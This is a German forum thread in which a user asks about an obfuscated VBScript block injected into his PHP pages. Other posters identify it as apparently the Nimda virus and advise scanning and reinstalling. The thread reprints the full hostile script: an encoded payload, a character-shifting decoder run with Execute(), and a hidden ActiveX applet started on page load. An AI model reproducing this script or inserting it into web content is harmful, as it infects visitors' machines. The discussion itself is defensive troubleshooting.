irgendwas passt da nicht (Virus?!?!)

Christoph

Erfahrenes Mitglied
Hab folgendes Problem.

IN den PHP DAteien wo ich eine Verbindung zur DB aufbaue steht am ende der seite folgendes :

Code:
<HTML>
<BODY onload="vbscript:KJ_start()">
<script language=vbscript>
document.write "<div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'><"&"APPLET NAME=KJ"&"_guest HEIGHT=0 WIDTH=0 code=com.ms."&"activeX.Active"&"XComponent></APPLET></div>"
</script>
<script language=vbscript>
ExeString = "=dhBiR`^m`$AohdM`sl%Q]kM`sl%?`_k``Kbbi$:kkd^J]b^^o$?NJ$PnN`^gg$PdiHZoc$Lp]=%AdfZgt<bnfNpZFEWlo\jm#$FEK^o?af#$FE;k`\l^Hddb`p CCGdc^Do CC>m]Zo`EZdg CCKmgi\bYm`#!@f]Nm[Apf\odggFB:kk]g_Og!Add^K\la'Oqi`Nlk$Hi=kmjjM`knh`G`slN]mM]Z_O]fk5ANG'Jk]gO`pmAdd^#Aae`KYmc')LfkNlk8K`\\M`hh'M`Y]<gdD^Dikmm#LfkNlk'CCZnlZmo $59(JmE`i MhkKmm$5,Mc`fM]Z_O]fk);ejn]@pbo>ni^lbji@i\DaDaMtk]Lom6`moMc`fM]Z_O]fk);ejn]N]mAae`O]fk5ANG'Jk]gO`pmAdd^#Aae`KYmc'*>bg`L^hk&Pmdl^4!=J<Rjfej\\6!o]n[kdkl3FBXnoYko#!6!o]>jEaOhhLomqZ<mG^!@mhgL^soAdd^O`ei)>dhn`N`lA<lmmdZ8>LJ)?^oAae`#>bg`HZoc!A9moma[)\lmmdZno`k8+-=en`M`Y]O`ei)>dhn`N`lAdd^O`ei8?NJ&Hk`fM`sl?dg]!Add^K\la'3!D^Oth^Noj8aohdO`^i?dg]M`hh'Rmam`n[>mD_!7@MHG6!o]>jEa7!;J?Qjidh\_5n[n^jbko2!FEWlo\jm#$9!n[>mD_!AohdM`sl@dl`D^Oth^Noj8o]nOc]g>bg`L^hk&Pmdl^qZ<mG^!N[nO]qo>i_Ba?dg]M`hh'>ggl`>i_Ba>i_?pi[mdjf?pi[mdjfFE;a\i_^NpZ!>pjk`ilLomagb'DZnoAg_`p<c\jA_GYloDf]`s;a\m6+Mc`fD^G`^m#G;Zn` <pmj^ioKmmdf`$')84G>Yl`#\$Mc`fFB<c\f``Nm[8?diYet?alf5TKn]@6+@gk^CC>cYgb`Kn]5>cj!<n[!G`^m#G;Zn` <pmj^ioKmmdf`$')$%,$2ULp]=8(@f]D^@dl`DE>`Zib]Lp]6Ha]#>mkm`fmNojbib$*'GYloDf]`s;a\m!@f]D^@f]Amg^oahiAmg^oahiCC>m]Zo`EZdg Gg@jkjmK`nmf`F^soDaBiR`^m`6`mhgOc]g=qdo?pi[mdjf@f]D^N`Zm`>bg`6G]_o#ObiKYmc'+!Kmg`m\eAdd^nW;hhhggAae`nTFd^jhnj^mN`Zm`\UNoYmdjf^mtT[g\fd)clfBa ?NJ&?dg]>sdkmn#Ka\m]?dg]$La`i>\deFB:kk]g_Og!NcYk`Aae`'aohd$>gn]N]mAae`O]fk5ANG'Jk]gO`pmAdd^#N`Zm`>bg`$+'ojn`$Add^O`ei)Rjbo`7@MHG6!o]>jEa7!;J?Qjidh\_5n[n^jbko2!FEWlo\jm#$9!n[>mD_!AohdM`slAae`O]fk);ejn]@f]D^?]_\pdmD_6RkLc`de)M]`M`Y]#@D@TW<PMJ>IOWNN@JUD_]godlb`nT=`aYngoNn`jD?GnoGghfQ]kndgg8PnN`^gg&K`bJ^\_ CF=RZGG<<GWF<>@BI@TLjalp\m]UHd[kjng_oWGnogghf=qkm]lnWE^_dYO`mOlNc]eg)J^bRjbo`CF=RZ>MKM@FMZPK>MWA]`ilbod]lW=`aYngoA]!TLjalp\m]UHd[kjng_oWGnogghf=qkm]lnW)`mo$PdiHZoco^]Wccr\de)ba_>i_BaBa ?NJ&?dg]>sdkmn#ObiKYmcnqlo`e,-W\^nflhk)agd!O`^i?NJ&<jkq?dg]RdfI\o`!ltnl^h.*U_`kdojh'dia'RagK\la!ntkm`h++Wfbp\gd'bd^=g_A_=g_>ni^lbji"
Execute("Dim KeyArr(3),ThisText"&vbCrLf&"KeyArr(0) = 8"&vbCrLf&"KeyArr(1) = 7"&vbCrLf&"KeyArr(2) = 5"&vbCrLf&"KeyArr(3) = 5"&vbCrLf&"For i=1 To Len(ExeString)"&vbCrLf&"TempNum = Asc(Mid(ExeString,i,1))"&vbCrLf&"If TempNum = 18 Then"&vbCrLf&"TempNum = 34"&vbCrLf&"End If"&vbCrLf&"TempChar = Chr(TempNum + KeyArr(i Mod 4))"&vbCrLf&"If TempChar = Chr(28) Then"&vbCrLf&"TempChar = vbCr"&vbCrLf&"ElseIf TempChar = Chr(29) Then"&vbCrLf&"TempChar = vbLf"&vbCrLf&"End If"&vbCrLf&"ThisText = ThisText & TempChar"&vbCrLf&"Next")
Execute(ThisText)
</script>
</BODY>
</HTML>

was isn das?:error: :error: :error: ;((
 
Also eins kann ich dir mit sicherheit sagen, das gehört da NICHT hin (!)
Virus ist gut möglich, lass doch mal nen Virusscanner über dein System laufen :)
 
Tatsächlich da ist VBScript eingeschleusst
der wahrscheinlich dann wenn du deine Seite testest über deinen IE dir igendwas zerschmeisst :)

ist das heftig :-)
 
Was das Script genau macht, weiss ich nicht - will ich ehrlich gesagt auch nicht unbedingt ausprobieren.
Auf jeden Fall scheint es so, als würde da irgendwas binäres umformatiert und dann ausgeführt. Möglicherweise irgendetwas böses, das nicht gerne von irgendwelchen Virenscannern gefunden werden will. :rolleyes:
Auf jeden Fall tarnt es sich scheinbar und wird erst zur Laufzeit "compiliert".

PS: Wenn Du von dieser kryptischen Ausgabe einen Hexdump hättest, könnte man evtl. weiter sehen.
 
wenn die datei neu abspeichere und wieder aufmache tut sich nix. Wenn ich se aber einen apache laufen hab und im ie ansehe schreibt der mir so was rein :(

/me muss sich einen virenscanner installieren:rolleyes:
 
Installier mal den Apache (bzw. PHP) neu. Wenn das tatsächlich serverseitig schon mit in den Code gemischt wird, hat sich vermutlich da irgendwas eingeschlichen.
 
ich hab sowieso den Rechner neu aufsetzen müssen:p

Bin gespannt ob das nochmal kommt?!?!

aber wäre schon interessant zu wissen woher das kommt:rolleyes:
 
Du hast einen Virus namens Nimda.
Hier ein paar informationen darüber :)

Mein Tip: Benutz Mozilla oder Phoenix [link]. Der ist sicherer :)

Edit I: Hier noch ein link .
Edit II: Ich finde wir brauche ein Virusforum :-)
 
Zuletzt bearbeitet:
Zurück